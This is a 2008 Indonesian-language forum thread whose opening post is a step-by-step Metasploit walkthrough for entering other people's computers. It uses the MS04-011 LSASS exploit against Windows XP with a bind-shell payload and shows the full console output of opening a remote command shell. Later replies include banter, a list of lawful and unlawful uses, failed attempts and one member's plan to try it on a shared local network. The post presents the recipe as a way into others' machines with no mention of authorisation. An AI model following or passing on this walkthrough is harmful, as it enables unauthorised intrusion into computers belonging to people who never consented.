IndeksCalendarFAQPencarianAnggotaGroupPendaftaranLogin
Share | 
 

 CARA MASUK KOMP ORANG LAIN DG METASPLOIT

Topik sebelumnya Topik selanjutnya Go down 
Pilih halaman : 1, 2  Next
PengirimMessage
ajenk_rante
Murid Lama
Murid Lama


Jumlah posting: 44
Join date: 05.03.08
Age: 24
Lokasi: bale endah city

PostSubyek: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Sat Apr 12, 2008 11:47 pm

Very Happy heheheh mari berbagi

nich..cara2nya...pk metasploit framework-3.1

1. Jalanin programnya...
2. truz..teken tombol CTRL+O bwat masuk ke konsolnya..
3. maka akan muncul konsol spt ini

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >

4. liat smua exploit yg ada...(tuk iseng doank
msf > show exploits

5. load modul exploit, qta gunain exploit lsass spt cara diatas

msf > use windows/smb/ms04_011_lsass

6. Tentukan sistem operasi target... misal target menggunakan XP

maka targetnya spt berikut

msf exploit(ms04_011_lsass) > set target 2

target => 2

7. Tampilin payloadnya apa aja yg ada..

msf exploit(ms04_011_lsass) > show payloads

8. karena qta mo msk k konsol, qta plh payload generic/shell_bind_tcp

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

9. Udah ntuh tentuin IP si target...misal ip si target 192.168.113.14

msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14

10. Udah dech...tinggal jalanin perintah exploit...

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
[*] The DCERPC service did not reply to our request

lihat di sana ada tulisan Command shell session 3 opened...ini menandakan qta sudah berhasil msk...dan shell qta di simpan di session 3.

11. Selanjutnya qta tampilin...isi session qta

msf exploit(ms04_011_lsass) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

12. Udah itu...kita masuk ke session 3 tersebut, untuk masuk ke konsol....

msf exploit(ms04_011_lsass) > sessions -i 3

[*] Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

13. Hehe...dah masuk tuch lol!

pergunakan dengan baik dan benar

Embarassed untuk tutor lebih jelas liat aja di sini http://backtrackbox.com/tutorial/simple-tutorial-hacking-lan-using-metasploit-framework.box

terus buat download mesin nya disini aja ya Very Happy http://metasploit3.com/framework/download/
Kembali Ke Atas Go down
Lihat profil user http://sanghitam-mank.co.nr
richat
Tim penghibur
Tim penghibur


Jumlah posting: 599
Join date: 08.04.08
Age: 32
Lokasi: banyak

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Sun Apr 13, 2008 8:34 am

wajiggggggggggg metasploit hapy smile
gaya lah ajeng kawat mainannya metasploit
tapi keren juga scratch but nice edukation
Kembali Ke Atas Go down
Lihat profil user
richie_mang2000
Tim Penghibur
Tim Penghibur


Jumlah posting: 573
Join date: 05.03.08
Age: 29
Lokasi: bandoeng - kopo - bale endah

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Sun Apr 13, 2008 12:57 pm

Laughing wis keren ya yayang aing Embarassed

_________________




Kembali Ke Atas Go down
Lihat profil user http://mangsani.net78.net
ajenk_rante
Murid Lama
Murid Lama


Jumlah posting: 44
Join date: 05.03.08
Age: 24
Lokasi: bale endah city

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Sun Apr 13, 2008 1:03 pm

sanghitam wrote:
Laughing wis keren ya yayang aing Embarassed
Sleep cape dweh piuh

ia chat awalnya seeh ke yang susah ya Very Happy tapi di coba-coba Laughing eh ternyata gampang

lol! hidup ajenk Embarassed
Kembali Ke Atas Go down
Lihat profil user http://sanghitam-mank.co.nr
richat
Tim penghibur
Tim penghibur


Jumlah posting: 599
Join date: 08.04.08
Age: 32
Lokasi: banyak

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Sun Apr 13, 2008 1:45 pm

sugan teh si yayang na ngan bisa nga galingkeun bu'uk dan segala yang berbulu
pek teh bisa ngagalingkeun pc oge nya
bwahahahahaha hapy smile hapy smile hapy smile hapy smile hapy smile hapy smile
Kembali Ke Atas Go down
Lihat profil user
vai_ieky
Tim penghibur
Tim penghibur


Jumlah posting: 568
Join date: 07.03.08
Age: 32
Lokasi: Majalaya - Bandung

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Tue Apr 15, 2008 3:19 pm

tidak percuma pake embel - embel rante Laughing
sugan mantan reman ss
lol!
maksud na masuk komputer orang lain kumaha scratch
apakah sama seperti kita memakai remote admin
yang artinya full control yeee

lol! rada binun nih teteh
Kembali Ke Atas Go down
Lihat profil user http://www.facebook.com/vai.ieky
richat
Tim penghibur
Tim penghibur


Jumlah posting: 599
Join date: 08.04.08
Age: 32
Lokasi: banyak

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Tue Apr 15, 2008 11:55 pm

ups bagus nih untuk di bahas
ok mas emas
sebenernya sepengetahuan sayah metasploit digunakan untuk
1 reset dan penelitian eksploitasi keamanan
2 memahami cara kerja serangan
3 penetration testing
4 testing IPS/IDS
5 demo atau persentasi
6 legal hacking event
dan metasploi ternyata juga bisa di gunakan untuk
1 ilegal hacking
2 kompatibilitas
3 user interface
4 exploits
5 payloads
6 auxiliary
metasploit framework2.x
user interface

nah itulah bentuk console metasploit yang gak pernah bisa sayah mengerti hapy smile hapy smile
Kembali Ke Atas Go down
Lihat profil user
vai_ieky
Tim penghibur
Tim penghibur


Jumlah posting: 568
Join date: 07.03.08
Age: 32
Lokasi: Majalaya - Bandung

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Wed Apr 16, 2008 3:24 am

richat wrote:
ups bagus nih untuk di bahas
ok mas emas
sebenernya sepengetahuan sayah metasploit digunakan untuk
1 reset dan penelitian eksploitasi keamanan
2 memahami cara kerja serangan
3 penetration testing
4 testing IPS/IDS
5 demo atau persentasi
6 legal hacking event
dan metasploi ternyata juga bisa di gunakan untuk
1 ilegal hacking
2 kompatibilitas
3 user interface
4 exploits
5 payloads
6 auxiliary
metasploit framework2.x
user interface

nah itulah bentuk console metasploit yang gak pernah bisa sayah mengerti hapy smile hapy smile

eta cenah rek dibahas naha tungtungna gak pernah bisa sayah mengerti ouugh
tapi yang pasti mah asal dalam penggunaan di jalan yang benar sajah cameuh
waktunya belajar hal yang baru lagi
Kembali Ke Atas Go down
Lihat profil user http://www.facebook.com/vai.ieky
richat
Tim penghibur
Tim penghibur


Jumlah posting: 599
Join date: 08.04.08
Age: 32
Lokasi: banyak

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Sat Apr 19, 2008 9:19 am

ok mari kita bahas ttg metasploit tapi ini gak lengkap yah hanya sepengetahuan ajah
hihihihihihi
tools anu di gunakeun metaslpoit framework untuk melakukan exploit serta pwddump6 untuk mengambil hush file dari komputer target. apa itu metasploit:
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.
tah vai terjemahkeun ku ente nya
heuheuehuehuehue
Kembali Ke Atas Go down
Lihat profil user
Daris
Murid Baru
Murid Baru


Jumlah posting: 1
Join date: 03.06.08
Age: 30
Lokasi: Bogor

PostSubyek: exploit   Thu Jun 05, 2008 2:38 pm

neng kemarin dah nyobain cara itu tapi ga muncul tulisan ini
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)

Kunaon tah ? bisa kaya gitu...bisa dibantu ga? mungkin ada yg tau sabandung we lah...
Kembali Ke Atas Go down
Lihat profil user
richie_mang2000
Tim Penghibur
Tim Penghibur


Jumlah posting: 573
Join date: 05.03.08
Age: 29
Lokasi: bandoeng - kopo - bale endah

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Thu Jun 05, 2008 8:16 pm

Daris wrote:
neng kemarin dah nyobain cara itu tapi ga muncul tulisan ini
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)

Kunaon tah ? bisa kaya gitu...bisa dibantu ga? mungkin ada yg tau sabandung we lah...

boleh nambahin sedikit mas Very Happy

emang dengan cara ini ga 100% bisa berhasil pasti ada saja cacad nya
mungkin di akibatkan dengan skuriti yang di pake sama komputer target itu sendiri sudah bisa mengalahkan metaxploit itu sendiri

mungkin buat neng ajeng coba cariin lagi ya metaexploit yang persi 2008 aja kali ya Crying or Very sad kyknya yang ini dah banyak kekuranganya ih

lol! pis terima kasi bapak bapak ibu ibu lol!

_________________




Kembali Ke Atas Go down
Lihat profil user http://mangsani.net78.net
invorno2212
Rektor
Rektor


Jumlah posting: 460
Join date: 07.03.08
Lokasi: bdg euy

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Thu Jun 05, 2008 11:37 pm

No No oh ieu geuning nya anu keur itu rek nyoba asup kana kompu saya No No pamacan pamacan


ih ih ajeng rante ih ih broken
Kembali Ke Atas Go down
Lihat profil user http://iwancastle.wordpress.com/
dhikdhik_aja
Murid Lama
Murid Lama


Jumlah posting: 49
Join date: 05.06.08

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Tue Jun 10, 2008 7:32 pm

Laughing Laughing Laughing Laughing Laughing Laughing Laughing Laughing
buagus tenan.... kalu di sp2 jebol ga tapi dikasaih firewall ..... dikostq dilan jadi mau tak praktekinahhhhhhhhhh muahhhhhhhhhhhhhhhhhhhhhh makasih alias kamsia
Kembali Ke Atas Go down
Lihat profil user
sankye
Murid Baru
Murid Baru


Jumlah posting: 17
Join date: 10.03.08
Lokasi: jakarta

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Mon Jun 16, 2008 8:44 pm

mau nanya nih mas.......apa di koputer yang mau kita masukin dengan sofware yang sehu sehu bahas disananya harus sudah ter install juga ato otomatis......
cuma cara kita mau masuk ke komputer orang gimana tuh.....
tolong jawaban nya para sehu cameuh di tunggu ya jawaban nya sunny
Kembali Ke Atas Go down
Lihat profil user
richat
Tim penghibur
Tim penghibur


Jumlah posting: 599
Join date: 08.04.08
Age: 32
Lokasi: banyak

PostSubyek: Re: CARA MASUK KOMP ORANG LAIN DG METASPLOIT   Sat Jun 21, 2008 1:17 am

wah cara nya sih gampang sajah sany
coba buka komputernya trus isinya keluarin trus saninya masuk deh dalam komputernya trus titip deh byar angeut !! mudah kan pahlawan_bertopeng
Kembali Ke Atas Go down
Lihat profil user
 

CARA MASUK KOMP ORANG LAIN DG METASPLOIT

Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 2Pilih halaman : 1, 2  Next

 Similar topics

-
» Sell mobil/rumah ke orang lain
» 10 Orang Tercepat
» *Salam kenal, masuk sini & cukup 1x p0sting*
» Cara Hack Wifi With CMD
» cara hack ID Point Blank

Permissions in this forum:Anda tidak dapat menjawab topik
 ::  ::  :: -